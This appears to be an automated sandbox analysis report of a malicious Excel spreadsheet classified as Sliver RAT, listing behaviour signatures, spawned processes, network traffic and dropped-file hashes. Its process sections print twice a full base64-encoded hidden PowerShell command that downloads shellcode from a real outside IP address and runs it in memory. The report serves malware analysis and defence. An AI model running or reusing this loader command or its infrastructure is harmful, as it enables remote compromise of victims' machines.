Analysis Overview
SHA256
dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578
Threat Level: Known bad
The file dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578 was found to be: Known bad.
Malicious Activity Summary
Sliver family
Sliver RAT v2
SliverRAT
Process spawned unexpected child process
Office macro that triggers on suspicious action
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 21:16
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-10 21:16
Reported
2024-11-10 21:19
Platform
win7-20241010-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sliver family
SliverRAT
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g7xy63dt.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC45.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCC44.tmp"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
dw20.exe -x -s 824
Network
| Country | Destination | Domain | Proto |
| CH | 194.182.164.149:8080 | 194.182.164.149 | tcp |
Files
memory/2620-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2620-1-0x000000007260D000-0x0000000072618000-memory.dmp
memory/2620-9-0x0000000006230000-0x0000000006330000-memory.dmp
memory/2620-8-0x0000000006230000-0x0000000006330000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\g7xy63dt.cmdline
| MD5 | 103aa305c0d49e651fd17237c7bd4140 |
| SHA1 | 1db7c88478e3d2861723c5b702c86279e2c978fa |
| SHA256 | 614d95a155f2682004dc54bae92625e8a6110e48fc5c6d7a8643d4b718f31ddb |
| SHA512 | d2fa70659af3aa8808b57784f76fa5f719609f79fdc5355a4aebdf3e58f258f34e191f465b18c13da325af130032e8ea120e85541d593aa07593fdbbb8d955fc |
\??\c:\Users\Admin\AppData\Local\Temp\g7xy63dt.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\CSCCC44.tmp
| MD5 | 3bdb4c0ff50ac8db2816ab3828972dbc |
| SHA1 | 445846e2b40ea735028682a2b73773a3bf3b87ee |
| SHA256 | 078938aa1ffa8791964a942dd3a11bda900c01538156d8bbac2dab100d265a50 |
| SHA512 | e6a7f9d098d43c06924050de7a00fc01f46c5465435d846f19d46f7ece4c391c3d511f235f696772c39a9a009b968b1d55606407c53b3c780ef5edeab9d11b6a |
C:\Users\Admin\AppData\Local\Temp\RESCC45.tmp
| MD5 | 2718fbc41bd4b9ba2c492c36ae29cdd7 |
| SHA1 | 7afcb9109e85ea22300d0127df08b2b94b98cf4f |
| SHA256 | 5033ec0e95c464be140d024d09c435689be608b9ea177de2649292ff346a9963 |
| SHA512 | a77773572b71d059b70154ed0d803a14450988342a020087286ce851c5a0e6f1783476469fb894595c8adce64e273d8e0c3846bdd2f5dc06c6a61e919202d8cb |
C:\Users\Admin\AppData\Local\Temp\g7xy63dt.dll
| MD5 | d2b609e9105a9762694dc1bb78e0251a |
| SHA1 | 727e6a3b3e528336b0a41cd8772a721ceb58826b |
| SHA256 | 6f0f1a4aed1675de5922a8a1d3e1dca64f73cf3af3ecc864d1d7c92972d0dc04 |
| SHA512 | 48da9ddf4a163d84b6db47b4d0a030e662dd301b9e8c02609ff892977d60f1965594959e49c388c89864b015a617c3a0b037fd58eec56ee0be4135c7d7185c81 |
C:\Users\Admin\AppData\Local\Temp\g7xy63dt.pdb
| MD5 | b82af3e1871c8e0c8eacaee752f41107 |
| SHA1 | a2a9a9df5d858386387069886e7ed4a8abf354bf |
| SHA256 | 7b26fe257d10bb5500f26e1d7b3cb8599c58f5e8289571d1410e73c6d85160b5 |
| SHA512 | 78d117484aa2fb222069a8f4af7fa57ccd8fa265d268816f53b87a611ace0c3d4fb921baf348177b8f79ffe130235e55e09650147d19d887c6637f3e0c279bfe |
C:\Users\Admin\AppData\Local\Temp\CabE301.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2620-43-0x000000007260D000-0x0000000072618000-memory.dmp
memory/2620-44-0x0000000006230000-0x0000000006330000-memory.dmp
memory/2952-45-0x0000000006770000-0x00000000071EE000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-10 21:16
Reported
2024-11-10 21:19
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
152s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sliver family
SliverRAT
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1516 wrote to memory of 3924 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1516 wrote to memory of 3924 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3924 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 3924 wrote to memory of 1256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 1256 wrote to memory of 3452 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 1256 wrote to memory of 3452 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\dc0732351781aec6aa0c00e14c96d285ce457c9f541670d506f5d8f43918e578.xls"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phphutyt\phphutyt.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D3E.tmp" "c:\Users\Admin\AppData\Local\Temp\phphutyt\CSC2A904C096FD447478D207CE19AE7F1.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 102.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| CH | 194.182.164.149:8080 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 149.164.182.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| CH | 194.182.164.149:443 | tcp | |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | tcp | |
| US | 8.8.8.8:53 | 66.208.201.84.in-addr.arpa | udp |
| CH | 194.182.164.149:443 | tcp | |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
| CH | 194.182.164.149:80 | 194.182.164.149 | tcp |
